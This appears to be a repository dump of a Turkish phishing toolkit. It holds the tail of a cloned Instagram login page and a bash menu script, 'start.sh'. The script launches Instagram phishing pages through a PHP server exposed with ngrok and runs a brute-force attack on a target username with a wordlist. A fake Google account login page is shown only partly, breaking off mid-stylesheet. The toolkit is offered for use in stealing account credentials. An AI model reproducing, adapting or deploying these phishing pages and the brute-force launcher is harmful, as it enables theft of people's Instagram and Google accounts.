raftsPageContainer.js/1445fff00a34.js\",\"233\":\"/static/bundles/es6/IGTVVideoUploadPageContainer.js/6077185515e8.js\",\"234\":\"/static/bundles/es6/OAuthPermissionsPage.js/65f83ec14cd1.js\",\"235\":\"/static/bundles/es6/MobileDirectPage.js/63522b45b2d1.js\",\"236\":\"/static/bundles/es6/DesktopDirectPage.js/a88c9e8aebb6.js\",\"237\":\"/static/bundles/es6/OneTapUpsell.js/dc7cf0e0bc42.js\",\"238\":\"/static/bundles/es6/NametagLandingPage.js/5c2f678fb81a.js\",\"239\":\"/static/bundles/es6/LocalDevTransactionToolSelectorPage.js/69109b159746.js\",\"240\":\"/static/bundles/es6/FBEAppStoreErrorPage.js/179d980f84af.js\",\"241\":\"/static/bundles/es6/BloksShellPage.js/a844fda3808b.js\",\"242\":\"/static/bundles/es6/BusinessCategoryPageContainer.js/9ce45f48d516.js\",\"243\":\"/static/bundles/es6/ActivityFeedBox.js/c01fb18e9731.js\",\"244\":\"/static/bundles/es6/DirectMQTT.js/b617c9b4afc5.js\",\"245\":\"/static/bundles/es6/DebugInfoNub.js/b039bc23bc2b.js\",\"247\":\"/static/bundles/es6/Consumer.js/fbbd80d076a0.js\",\"248\":\"/static/bundles/es6/Challenge.js/3625de9b3ec8.js\",\"249\":\"/static/bundles/es6/NotificationLandingPage.js/6ecfb32c9ef3.js\",\"266\":\"/static/bundles/es6/EmbedAsyncLogger.js/de5a48d52cd4.js\",\"267\":\"/static/bundles/es6/EmbedVideoWrapper.js/b4680c0b7fc3.js\",\"268\":\"/static/bundles/es6/EmbedSidecarEntrypoint.js/f68cb38edadc.js\",\"269\":\"/static/bundles/es6/EmbedRich.js/d1eedf297658.js\"},\"css\":{\"146\":\"/static/bundles/es6/IGBloksRenderer.css/52baaabd26d9.css\",\"148\":\"/static/bundles/es6/MobileStoriesLoginPage.css/5056413a4d65.css\",\"149\":\"/static/bundles/es6/DesktopStoriesLoginPage.css/f6b046e2e7ad.css\",\"150\":\"/static/bundles/es6/AvenyFont.css/25fd69ff2266.css\",\"151\":\"/static/bundles/es6/DirectSearchUserContainer.css/c999b2120675.css\",\"152\":\"/static/bundles/es6/MobileStoriesPage.css/a8f13052a2e4.css\",\"153\":\"/static/bundles/es6/DesktopStoriesPage.css/1f0995409fda.css\",\"154\":\"/static/bundles/es6/ActivityFeedPage.css/c1a6963ef0be.css\",\"155\":\"/static/bundles/es6/AdsSettingsPage.css/a81732309c0f.css\",\"156\":\"/static/bundles/es6/DonateCheckoutPage.css/a81732309c0f.css\",\"157\":\"/static/bundles/es6/CameraPage.css/c5ef5083675c.css\",\"158\":\"/static/bundles/es6/SettingsModules.css/b436e608d092.css\",\"159\":\"/static/bundles/es6/ContactHistoryPage.css/6450a9697d3b.css\",\"160\":\"/static/bundles/es6/AccessToolPage.css/34921b2f36dd.css\",\"161\":\"/static/bundles/es6/AccessToolViewAllPage.css/ddca305d0cd5.css\",\"162\":\"/static/bundles/es6/AccountPrivacyBugPage.css/beafbf8dca83.css\",\"165\":\"/static/bundles/es6/ShoppingBagLandingPage.css/9ea9da8878b6.css\",\"170\":\"/static/bundles/es6/AndroidBetaPrivacyBugPage.css/e8cfdb9e50b0.css\",\"171\":\"/static/bundles/es6/DataControlsSupportPage.css/71a52e3d8bd5.css\",\"172\":\"/static/bundles/es6/DataDownloadRequestPage.css/db778d9553c5.css\",\"173\":\"/static/bundles/es6/DataDownloadRequestConfirmPage.css/1e9cdea74d83.css\",\"174\":\"/static/bundles/es6/CheckpointUnderageAppealPage.css/93e7a8868931.css\",\"175\":\"/static/bundles/es6/AccountRecoveryLandingPage.css/8df38b0b73ab.css\",\"176\":\"/static/bundles/es6/ContactInvitesOptOutPage.css/4c523a7df813.css\",\"177\":\"/static/bundles/es6/ParentalConsentPage.css/64034d3fadb2.css\",\"178\":\"/static/bundles/es6/ParentalConsentNotParentPage.css/a268c09f2b2c.css\",\"179\":\"/static/bundles/es6/TermsAcceptPage.css/f93160eb7986.css\",\"180\":\"/static/bundles/es6/TermsUnblockPage.css/c0bb73c157c6.css\",\"181\":\"/static/bundles/es6/NewTermsConfirmPage.css/5bd6ec78e196.css\",\"182\":\"/static/bundles/es6/ContactInvitesOptOutStatusPage.css/7d5282ddec05.css\",\"183\":\"/static/bundles/es6/CreationModules.css/5e069ecf9a00.css\",\"184\":\"/static/bundles/es6/StoryCreationPage.css/63ec3b508efa.css\",\"185\":\"/static/bundles/es6/PostCommentInput.css/58b93ef96160.css\",\"188\":\"/static/bundles/es6/PostModalEntrypoint.css/22326130afec.css\",\"189\":\"/static/bundles/es6/PostComments.css/2c4993169770.css\",\"190\":\"/static/bundles/es6/LikedByListContainer.css/cfbb06eb7d39.css\",\"191\":\"/static/bundles/es6/CommentLikedByListContainer.css/cfbb06eb7d39.css\",\"193\":\"/static/bundles/es6/DynamicExploreMediaPage.css/e058d3c6e0d0.css\",\"194\":\"/static/bundles/es6/DiscoverMediaPageContainer.css/03f4f86f1fb7.css\",\"195\":\"/static/bundles/es6/DiscoverPeoplePageContainer.css/744bc0f41de4.css\",\"196\":\"/static/bundles/es6/EmailConfirmationPage.css/d3ff48c961de.css\",\"197\":\"/static/bundles/es6/EmailReportBadPasswordResetPage.css/e4462019534b.css\",\"198\":\"/static/bundles/es6/FBSignupPage.css/ec2ddf131f68.css\",\"199\":\"/static/bundles/es6/NewUserInterstitial.css/27fbefcbd7f3.css\",\"200\":\"/static/bundles/es6/MultiStepSignupPage.css/312fc18c4342.css\",\"201\":\"/static/bundles/es6/EmptyFeedPage.css/aca00e00c692.css\",\"203\":\"/static/bundles/es6/FeedEndSuggestedUserUnit.css/97ff07a6ffa3.css\",\"204\":\"/static/bundles/es6/FeedSidebarContainer.css/b880dc2e9050.css\",\"205\":\"/static/bundles/es6/SuggestedUserFeedUnitContainer.css/75311a87837c.css\",\"206\":\"/static/bundles/es6/InFeedStoryTray.css/6edd85f893b3.css\",\"207\":\"/static/bundles/es6/FeedPageContainer.css/c77bce422006.css\",\"208\":\"/static/bundles/es6/FollowListModal.css/ce5341511d05.css\",\"209\":\"/static/bundles/es6/FollowListPage.css/6be4a4ddbbac.css\",\"210\":\"/static/bundles/es6/SimilarAccountsPage.css/3eb8b47abd2e.css\",\"211\":\"/static/bundles/es6/LiveBroadcastPage.css/9247ab121c6b.css\",\"213\":\"/static/bundles/es6/LandingPage.css/8751804c0079.css\",\"214\":\"/static/bundles/es6/LocationsDirectoryCountryPage.css/4dacfdb3fce0.css\",\"215\":\"/static/bundles/es6/LocationsDirectoryCityPage.css/4dacfdb3fce0.css\",\"216\":\"/static/bundles/es6/LocationPageContainer.css/14fc1d2d5a53.css\",\"217\":\"/static/bundles/es6/LocationsDirectoryLandingPage.css/8d8beac67daf.css\",\"218\":\"/static/bundles/es6/LoginAndSignupPage.css/c9eae584ca84.css\",\"219\":\"/static/bundles/es6/UpdateIGAppForHelpPage.css/6fb2336f846b.css\",\"220\":\"/static/bundles/es6/ResetPasswordPageContainer.css/68d92b16f480.css\",\"221\":\"/static/bundles/es6/MobileAllCommentsPage.css/75889bbbe1a0.css\",\"222\":\"/static/bundles/es6/MediaChainingPageContainer.css/7545b45c1f14.css\",\"223\":\"/static/bundles/es6/PostPageContainer.css/42450f7c438d.css\",\"224\":\"/static/bundles/es6/ProfilesDirectoryLandingPage.css/19082083377e.css\",\"225\":\"/static/bundles/es6/HashtagsDirectoryLandingPage.css/19082083377e.css\",\"226\":\"/static/bundles/es6/SuggestedDirectoryLandingPage.css/19082083377e.css\",\"227\":\"/static/bundles/es6/TagPageContainer.css/997ce5b0b414.css\",\"228\":\"/static/bundles/es6/PhoneConfirmPage.css/a33c7f8186d0.css\",\"230\":\"/static/bundles/es6/ProfilePageContainer.css/aa2909da1754.css\",\"231\":\"/static/bundles/es6/HttpErrorPage.css/97acfee23c4f.css\",\"232\":\"/static/bundles/es6/IGTVVideoDraftsPageContainer.css/a7130ff308dd.css\",\"233\":\"/static/bundles/es6/IGTVVideoUploadPageContainer.css/b7c970972651.css\",\"234\":\"/static/bundles/es6/OAuthPermissionsPage.css/9cf84c997572.css\",\"235\":\"/static/bundles/es6/MobileDirectPage.css/e103a5699243.css\",\"236\":\"/static/bundles/es6/DesktopDirectPage.css/ac3461855f63.css\",\"237\":\"/static/bundles/es6/OneTapUpsell.css/5563e4920af6.css\",\"238\":\"/static/bundles/es6/NametagLandingPage.css/f5a715b37996.css\",\"239\":\"/static/bundles/es6/LocalDevTransactionToolSelectorPage.css/3f8f9bb4c8a7.css\",\"240\":\"/static/bundles/es6/FBEAppStoreErrorPage.css/37c4f5efdab6.css\",\"241\":\"/static/bundles/es6/BloksShellPage.css/52baaabd26d9.css\",\"242\":\"/static/bundles/es6/BusinessCategoryPageContainer.css/2f33d401a70d.css\",\"243\":\"/static/bundles/es6/ActivityFeedBox.css/8f54c3789619.css\",\"245\":\"/static/bundles/es6/DebugInfoNub.css/f749d3fa9077.css\",\"247\":\"/static/bundles/es6/Consumer.css/5618806114ac.css\",\"248\":\"/static/bundles/es6/Challenge.css/d39665a620ec.css\",\"267\":\"/static/bundles/es6/EmbedVideoWrapper.css/edb8c1eb0abe.css\",\"268\":\"/static/bundles/es6/EmbedSidecarEntrypoint.css/7e979d7bcefa.css\",\"269\":\"/static/bundles/es6/EmbedRich.css/c9073defeed9.css\"}}</script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/Vendor.js/c911f5848b78.js\" crossorigin=\"anonymous\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/tr_TR.js/4efe3a559b4b.js\" crossorigin=\"anonymous\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/ConsumerLibCommons.js/aee2dda7a1bd.js\" crossorigin=\"anonymous\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/ConsumerUICommons.js/388ffaafb44f.js\" crossorigin=\"anonymous\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/ConsumerAsyncCommons.js/dbbcca2a020d.js\" crossorigin=\"anonymous\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/Consumer.js/fbbd80d076a0.js\" crossorigin=\"anonymous\" charset=\"utf-8\" async=\"\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/FBSignupPage.js/68cb30f9baf8.js\" crossorigin=\"anonymous\" charset=\"utf-8\" async=\"\"></script>\r\n            <script type=\"text/javascript\" src=\"/static/bundles/es6/LoginAndSignupPage.js/b2e37b561f81.js\" crossorigin=\"anonymous\" charset=\"utf-8\" async=\"\"></script>\r\n\r\n            \r\n\r\n\r\n            <script type=\"text/javascript\">\r\n              (function(){\r\n                function normalizeError(err) {\r\n                  var errorInfo = err.error || {};\r\n                  var getConfigProp = function(propName, defaultValueIfNotTruthy) {\r\n                    var propValue = window._sharedData && window._sharedData[propName];\r\n                    return propValue ? propValue : defaultValueIfNotTruthy;\r\n                  };\r\n                  return {\r\n                    line: err.line || errorInfo.message || 0,\r\n                    column: err.column || 0,\r\n                    name: 'InitError',\r\n                    message: err.message || errorInfo.message || '',\r\n                    script: errorInfo.script || '',\r\n                    stack: errorInfo.stackTrace || errorInfo.stack || '',\r\n                    timestamp: Date.now(),\r\n                    ref: window.location.href,\r\n                    deployment_stage: getConfigProp('deployment_stage', ''),\r\n                    is_canary: getConfigProp('is_canary', false),\r\n                    rollout_hash: getConfigProp('rollout_hash', ''),\r\n                    is_prerelease: window.__PRERELEASE__ || false,\r\n                    bundle_variant: getConfigProp('bundle_variant', null),\r\n                    request_url: err.url || window.location.href,\r\n                    response_status_code: errorInfo.statusCode || 0\r\n                  }\r\n                }\r\n                window.addEventListener('load', function(){\r\n                  if (window.__bufferedErrors && window.__bufferedErrors.length) {\r\n                    if (window.caches && window.caches.keys && window.caches.delete) {\r\n                      window.caches.keys().then(function(keys) {\r\n                        keys.forEach(function(key) {\r\n                          window.caches.delete(key)\r\n                        })\r\n                      })\r\n                    }\r\n                    window.__bufferedErrors.map(function(error) {\r\n                      return normalizeError(error)\r\n                    }).forEach(function(normalizedError) {\r\n                      var request = new XMLHttpRequest();\r\n                      request.open('POST', '/client_error/', true);\r\n                      request.setRequestHeader('Content-Type', 'application/json; charset=utf-8');\r\n                      request.send(JSON.stringify(normalizedError));\r\n                    })\r\n                  }\r\n                })\r\n              }());\r\n            </script>\r\n\r\n\r\n            <div class=\"Z2m7o\"><div class=\"CgFia \"></div></div><div id=\"fb-root\" class=\" fb_reset\"><div style=\"position: absolute; top: -10000px; width: 0px; height: 0px;\"><div></div></div></div></body></html>\r\n"
  },
  {
    "path": "Site/Instagram/start.sh",
    "content": "#!/bin/bash|\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\n\nclear\n\necho -e '\\033[32;40;1m\n        /\\︵-︵/\\\n        |( ◉)(◉)|\n        \\ ︶V︶ /\n        /↺↺↺↺↺↺↺\\\n        ↺↺↺↺↺↺↺↺|\n        \\↺↺↺↺↺↺↺/\n        ¯¯/\\¯/\\¯¯ '\n\n\n\necho -e \"\\033[31;40;1m\n\\033[31;40;1m[01]\\e[37mİnstagram Phishing          \\033[31;40;1m[02]\\e[37mİnstagram Brute-Force\n\\033[31;40;1m[03]\\e[37mİnstagram Fake Panel\n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\"\necho -e \"\\033[32;40;1m                      ~~~Yaman Efkar~~~\"\necho \"\"\nread -p \"İslem Numarası : \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: insta01\"\n\tsleep 2\n\techo \"\"\n\techo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n\tsleep 4\n\tcd Instagram-phishing/\n\tphp -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 2 || $islem == 02 ]]; then\n        cd  Instagram-bruteforce/\n        read -p \"Hedef Kullanıcının Username : \" username\n        echo \"\"\n        read -p \"Wordlist'in Bulunduğu Dizin : \" password\n        python3 instagram.py $username $password -m 3\n\nelif [[ $islem == 3 || $islem == 03 ]]; then\n        site=\"Instagram-fakepanel/\"\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: insta02\"\n\tsleep 2\n\techo \"\"\n\techo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n\tsleep 4\n\tcd Instagram-fakepanel/\n\tphp -S 127.0.0.1:$port > -t & ngrok http $port\n\telif [[ $islem == 9 || $islem == 99 ]]; then\n\tclear\n\techo -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\n\tsleep 1 \n\texit 1\nelif [[ $islem == 00 ]]; then\n\tcd ..\n\tcd ..\n\tbash tst.sh\n\n\nelse\n\techo -e '\\033[31;40;1m İslem Numaranızı Kontrol Ediniz!'\n\tsleep 2\n\tclear\n\tbash start.sh\nfi\n"
  },
  {
    "path": "Site/Mail/Site-gmail/index.php",
    "content": "<!DOCTYPE html>\r\n<html lang=\"en\"><head>\r\n<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">\r\n<link rel=\"icon\" type=\"image/ico\" href=\"https://mail.google.com/favicon.ico\">\r\n  <meta charset=\"utf-8\">\r\n  <title>Google Hesap</title>\r\n<style type=\"text/css\">\r\n  html, body, div, h1, h2, h3, h4, h5, h6, p, img, dl,\r\n  dt, dd, ol, ul, li, table, tr, td, form, object, embed,\r\n  article, aside, canvas, command, details, figcaption,\r\n  figure, footer, group, header, hgroup, mark, menu,\r\n  meter, nav, output, progress, section, summary,\r\n  time, audio, video {\r\n  margin: 0;\r\n  padding: 0;\r\n  border: 0;\r\n  }\r\n  article, aside, details, figcaption, figure, footer,\r\n  header, hgroup, menu, nav, section {\r\n  display: block;\r\n  }\r\n  html {\r\n  font: 81.25% arial, helvetica, sans-serif;\r\n  background: #fff;\r\n  color: #333;\r\n  line-height: 1;\r\n  direction: ltr;\r\n  }\r\n  a {\r\n  color: #15c;\r\n  text-decoration: none;\r\n  }\r\n  a:active {\r\n  color: #d14836;\r\n  }\r\n  a:hover {\r\n  text-decoration: underline;\r\n  }\r\n  h1, h2, h3, h4, h5, h6 {\r\n  color: #222;\r\n  font-size: 1.54em;\r\n  font-weight: normal;\r\n  line-height: 24px;\r\n  margin: 0 0 .46em;\r\n  }\r\n  p {\r\n  line-height: 17px;\r\n  margin: 0 0 1em;\r\n  }\r\n  ol, ul {\r\n  list-style: none;\r\n  line-height: 17px;\r\n  margin: 0 0 1em;\r\n  }\r\n  li {\r\n  margin: 0 0 .5em;\r\n  }\r\n  table {\r\n  border-collapse: collapse;\r\n  border-spacing: 0;\r\n  }\r\n  strong {\r\n  color: #222;\r\n  }\r\n  button, input, select, textarea {\r\n  font-family: inherit;\r\n  font-size: inherit;\r\n  }\r\n  button::-moz-focus-inner,\r\n  input::-moz-focus-inner {\r\n  border: 0;\r\n  }\r\n</style>\r\n<style type=\"text/css\">\r\n  html, body {\r\n  position: absolute;\r\n  height: 100%;\r\n  min-width: 100%;\r\n  }\r\n  .wrapper {\r\n  position: relative;\r\n  min-height: 100%;\r\n  }\r\n  .content {\r\n  margin: 0 auto;\r\n  width: 650px;\r\n  padding: 0 44px;\r\n  }\r\n  .google-header-bar {\r\n  height: 71px;\r\n  background: #f5f5f5;\r\n  border-bottom: 1px solid #e5e5e5;\r\n  overflow: hidden;\r\n  }\r\n  .header .logo {\r\n  margin: 18px 0 0 -1px;\r\n  float: left;\r\n  }\r\n  .header .signin,\r\n  .header .signup {\r\n  margin: 28px 0 0;\r\n  float: right;\r\n  font-weight: bold;\r\n  }\r\n  .header .signup-button {\r\n  margin: 22px 0 0;\r\n  float: right;\r\n  }\r\n  .header .signup-button a {\r\n  position: relative;\r\n  top: -1px;\r\n  margin: 0 0 0 1em;\r\n  }\r\n  .main {\r\n  padding-top: 23px;\r\n  padding-bottom: 125px;\r\n  }\r\n  .main h1:first-child {\r\n  margin: 0 0 .92em;\r\n  }\r\n  .google-footer-bar {\r\n  position: absolute;\r\n  bottom: 0;\r\n  height: 35px;\r\n  width: 100%;\r\n  border-top: 1px solid #ebebeb;\r\n  overflow: hidden;\r\n  }\r\n  .footer {\r\n  padding-top: 9px;\r\n  font-size: .85em;\r\n  white-space: nowrap;\r\n  line-height: 0;\r\n  }\r\n  .footer ul {\r\n  color: #999;\r\n  float: left;\r\n  max-width: 80%;\r\n  }\r\n  .footer ul li {\r\n  display: inline;\r\n  padding: 0 1.5em 0 0;\r\n  }\r\n  .footer form {\r\n  text-align: right;\r\n  }\r\n  .footer form .lang-chooser {\r\n  max-width: 20%;\r\n  }\r\n  .announce-bar {\r\n  position: absolute;\r\n  bottom: 35px;\r\n  height: 33px;\r\n  z-index: 2;\r\n  width: 100%;\r\n  background: #f9edbe;\r\n  border-top: 1px solid #efe1ac;\r\n  border-bottom: 1px solid #efe1ac;\r\n  overflow: hidden;\r\n  }\r\n  .announce-bar .message {\r\n  font-size: .85em;\r\n  line-height: 33px;\r\n  margin: 0;\r\n  }\r\n  .announce-bar a {\r\n  margin: 0 0 0 1em;\r\n  }\r\n  .clearfix:after {\r\n  visibility: hidden;\r\n  display: block;\r\n  font-size: 0;\r\n  content: '.';\r\n  clear: both;\r\n  height: 0;\r\n  }\r\n  * html .clearfix {\r\n  zoom: 1;\r\n  }\r\n  *:first-child+html .clearfix {\r\n  zoom: 1;\r\n  }\r\n</style>\r\n<style type=\"text/css\">\r\n  input[type=email],\r\n  input[type=password],\r\n  input[type=text],\r\n  input[type=url] {\r\n  display: inline-block;\r\n  height: 29px;\r\n  margin: 0;\r\n  padding-left: 8px;\r\n  background: #fff;\r\n  border: 1px solid #d9d9d9;\r\n  border-top: 1px solid #c0c0c0;\r\n  -webkit-box-sizing: border-box;\r\n  -moz-box-sizing: border-box;\r\n  box-sizing: border-box;\r\n  -webkit-border-radius: 1px;\r\n  -moz-border-radius: 1px;\r\n  border-radius: 1px;\r\n  }\r\n  input[type=email]:hover,\r\n  input[type=password]:hover,\r\n  input[type=text]:hover,\r\n  input[type=url]:hover {\r\n  border: 1px solid #b9b9b9;\r\n  border-top: 1px solid #a0a0a0;\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  }\r\n  input[type=email]:focus,\r\n  input[type=password]:focus,\r\n  input[type=text]:focus,\r\n  input[type=url]:focus {\r\n  outline: none;\r\n  border: 1px solid #4d90fe;\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  }\r\n  input[type=email][disabled=disabled],\r\n  input[type=password][disabled=disabled],\r\n  input[type=text][disabled=disabled],\r\n  input[type=url][disabled=disabled] {\r\n  border: 1px solid #e5e5e5;\r\n  background: #f5f5f5;\r\n  }\r\n  input[type=email][disabled=disabled]:hover,\r\n  input[type=password][disabled=disabled]:hover,\r\n  input[type=text][disabled=disabled]:hover,\r\n  input[type=url][disabled=disabled]:hover {\r\n  -webkit-box-shadow: none;\r\n  -moz-box-shadow: none;\r\n  box-shadow: none;\r\n  }\r\n  input[type=checkbox],\r\n  input[type=radio] {\r\n  -webkit-appearance: none;\r\n  appearance: none;\r\n  width: 13px;\r\n  height: 13px;\r\n  margin: 0;\r\n  cursor: pointer;\r\n  vertical-align: bottom;\r\n  background: #fff;\r\n  border: 1px solid #dcdcdc;\r\n  -webkit-border-radius: 1px;\r\n  -moz-border-radius: 1px;\r\n  border-radius: 1px;\r\n  -webkit-box-sizing: border-box;\r\n  -moz-box-sizing: border-box;\r\n  box-sizing: border-box;\r\n  position: relative;\r\n  }\r\n  input[type=checkbox]:active,\r\n  input[type=radio]:active {\r\n  border-color: #c6c6c6;\r\n  background: #ebebeb;\r\n  }\r\n  input[type=checkbox]:hover {\r\n  border-color: #c6c6c6;\r\n  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);\r\n  box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);\r\n  }\r\n  input[type=radio] {\r\n  -webkit-border-radius: 1em;\r\n  -moz-border-radius: 1em;\r\n  border-radius: 1em;\r\n  width: 15px;\r\n  height: 15px;\r\n  }\r\n  input[type=checkbox]:checked,\r\n  input[type=radio]:checked {\r\n  background: #fff;\r\n  }\r\n  input[type=radio]:checked::after {\r\n  content: '';\r\n  display: block;\r\n  position: relative;\r\n  top: 3px;\r\n  left: 3px;\r\n  width: 7px;\r\n  height: 7px;\r\n  background: #666;\r\n  -webkit-border-radius: 1em;\r\n  -moz-border-radius: 1em;\r\n  border-radius: 1em;\r\n  }\r\n  input[type=checkbox]:checked::after {\r\n  content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);\r\n  display: block;\r\n  position: absolute;\r\n  top: -6px;\r\n  left: -5px;\r\n  }\r\n  input[type=checkbox]:focus {\r\n  outline: none;\r\n  border-color:#4d90fe;\r\n  }\r\n  .g-button {\r\n  display: inline-block;\r\n  min-width: 54px;\r\n  text-align: center;\r\n  color: #555;\r\n  font-size: 11px;\r\n  font-weight: bold;\r\n  height: 27px;\r\n  padding: 0 8px;\r\n  line-height: 27px;\r\n  -webkit-border-radius: 2px;\r\n  -moz-border-radius: 2px;\r\n  border-radius: 2px;\r\n  -webkit-transition: all 0.218s;\r\n  -moz-transition: all 0.218s;\r\n  -ms-transition: all 0.218s;\r\n  -o-transition: all 0.218s;\r\n  transition: all 0.218s;\r\n  border: 1px solid #dcdcdc;\r\n  border: 1px solid rgba(0,0,0,0.1);\r\n  background-color: #f5f5f5;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1));\r\n  background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);\r\n  background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);\r\n  background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);\r\n  background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);\r\n  background-image: linear-gradient(top,#f5f5f5,#f1f1f1);\r\n  -webkit-user-select: none;\r\n  -moz-user-select: none;\r\n  user-select: none;\r\n  cursor: default;\r\n  }\r\n  *+html .g-button {\r\n  min-width: 70px;\r\n  }\r\n  button.g-button,\r\n  input[type=submit].g-button {\r\n  height: 29px;\r\n  line-height: 29px;\r\n  vertical-align: bottom;\r\n  margin: 0;\r\n  }\r\n  *+html button.g-button,\r\n  *+html input[type=submit].g-button {\r\n  overflow: visible;\r\n  }\r\n  .g-button:hover {\r\n  border: 1px solid #c6c6c6;\r\n  color: #333;\r\n  text-decoration: none;\r\n  -webkit-transition: all 0.0s;\r\n  -moz-transition: all 0.0s;\r\n  -ms-transition: all 0.0s;\r\n  -o-transition: all 0.0s;\r\n  transition: all 0.0s;\r\n  background-color: #f8f8f8;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#f8f8f8),to(#f1f1f1));\r\n  background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);\r\n  background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);\r\n  background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);\r\n  background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);\r\n  background-image: linear-gradient(top,#f8f8f8,#f1f1f1);\r\n  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  }\r\n  .g-button:active {\r\n  background-color: #f6f6f6;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#f6f6f6),to(#f1f1f1));\r\n  background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);\r\n  background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);\r\n  background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);\r\n  background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);\r\n  background-image: linear-gradient(top,#f6f6f6,#f1f1f1);\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  }\r\n  .g-button:visited {\r\n  color: #666;\r\n  }\r\n  .g-button-submit {\r\n  border: 1px solid #3079ed;\r\n  color: #fff;\r\n  text-shadow: 0 1px rgba(0,0,0,0.1);\r\n  background-color: #4d90fe;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed));\r\n  background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);\r\n  background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);\r\n  background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);\r\n  background-image: -o-linear-gradient(top,#4d90fe,#4787ed);\r\n  background-image: linear-gradient(top,#4d90fe,#4787ed);\r\n  }\r\n  .g-button-submit:hover {\r\n  border: 1px solid #2f5bb7;\r\n  color: #fff;\r\n  text-shadow: 0 1px rgba(0,0,0,0.3);\r\n  background-color: #357ae8;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#357ae8));\r\n  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);\r\n  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);\r\n  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);\r\n  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);\r\n  background-image: linear-gradient(top,#4d90fe,#357ae8);\r\n  }\r\n  .g-button-submit:active {\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  }\r\n  .g-button-share {\r\n  border: 1px solid #29691d;\r\n  color: #fff;\r\n  text-shadow: 0 1px rgba(0,0,0,0.1);\r\n  background-color: #3d9400;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#398a00));\r\n  background-image: -webkit-linear-gradient(top,#3d9400,#398a00);\r\n  background-image: -moz-linear-gradient(top,#3d9400,#398a00);\r\n  background-image: -ms-linear-gradient(top,#3d9400,#398a00);\r\n  background-image: -o-linear-gradient(top,#3d9400,#398a00);\r\n  background-image: linear-gradient(top,#3d9400,#398a00);\r\n  }\r\n  .g-button-share:hover {\r\n  border: 1px solid #2d6200;\r\n  color: #fff;\r\n  text-shadow: 0 1px rgba(0,0,0,0.3);\r\n  background-color: #368200;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#368200));\r\n  background-image: -webkit-linear-gradient(top,#3d9400,#368200);\r\n  background-image: -moz-linear-gradient(top,#3d9400,#368200);\r\n  background-image: -ms-linear-gradient(top,#3d9400,#368200);\r\n  background-image: -o-linear-gradient(top,#3d9400,#368200);\r\n  background-image: linear-gradient(top,#3d9400,#368200);\r\n  }\r\n  .g-button-share:active {\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  }\r\n  .g-button-red {\r\n  border: 1px solid transparent;\r\n  color: #fff;\r\n  